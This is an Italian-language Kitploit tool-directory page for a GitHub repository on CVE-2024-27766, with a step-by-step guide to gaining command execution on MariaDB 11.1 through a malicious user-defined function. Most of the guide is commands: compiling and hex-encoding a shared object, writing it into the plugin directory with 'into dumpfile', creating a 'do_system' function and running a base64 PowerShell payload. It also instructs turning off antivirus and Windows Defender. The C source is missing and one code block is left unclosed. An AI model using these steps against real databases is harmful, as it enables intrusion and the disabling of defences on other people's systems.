Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Mysql_CVE-2024-27766 — Esecuzione di codice autenticata sul database | Kitploit
Strumenti/GitHubGitHub/hissec/mysql_cve-2024-27766
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneSviluppo PayloadSicurezza dei Database
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

Esecuzione di codice autenticata sul database

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Guida alla riproduzione dell'exploit (versione del prodotto interessata MariaDB 11.1)

Questa guida fornisce istruzioni passo-passo per riprodurre un attacco tramite funzione definita dall'utente (UDF) su un sistema di database. Tieni presente che questo exploit potrebbe funzionare su alcuni sistemi, ma potrebbe non funzionare correttamente su architetture a 64 bit o su determinate build.

Avvertenza: Questo materiale è solo a scopo educativo. L'uso non autorizzato di queste tecniche è illegale e non etico.

Passaggi per riprodurre l'attacco

1. Scaricare e preparare il codice UDF

Innanzitutto, crea un file chiamato exploit.c e aggiungi il seguente codice:

root@kitploit:~

### 2. Compilare il codice UDF

Compila il codice dell'exploit usando il compilatore `x86_64-w64-mingw32-gcc`:

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. Creare un file oggetto condiviso

Genera un file oggetto condiviso (exploit.so) dal file oggetto compilato:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. Convertire il file oggetto condiviso in esadecimale

Usa xxd per convertire il file .so in formato esadecimale:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. Caricare il valore esadecimale nel database

Copia il valore esadecimale da hex_value.txt ed esegui il seguente comando nel tuo database:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. Determinare la directory dei plugin e distribuire l'exploit

Trova la directory dei plugin eseguendo:

root@kitploit:~
DB> select @@plugin_dir;

Quindi, crea l'oggetto condiviso dell'exploit nella directory dei plugin:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

Nota: Modifica il percorso in base alla configurazione del tuo sistema o alla directory dei plugin specifica.

7. Creare la funzione dannosa

Crea una nuova funzione nel database usando l'exploit:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. Eseguire l'exploit

Disattiva qualsiasi antivirus o Windows Defender che potrebbe bloccare l'exploit. Quindi, esegui un comando usando la funzione appena creata:

root@kitploit:~
DB> select do_system('powershell base64 here');

Sostituisci 'powershell base64 here' con il payload codificato in base64 del comando che desideri eseguire.


Dichiarazione di esclusione di responsabilità: Questo documento è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. L'uso improprio di queste informazioni può comportare accuse penali e gravi sanzioni legali. Ottieni sempre l'autorizzazione dalle autorità competenti prima di testare qualsiasi vulnerabilità su una rete o sistema.

Scarica lo strumento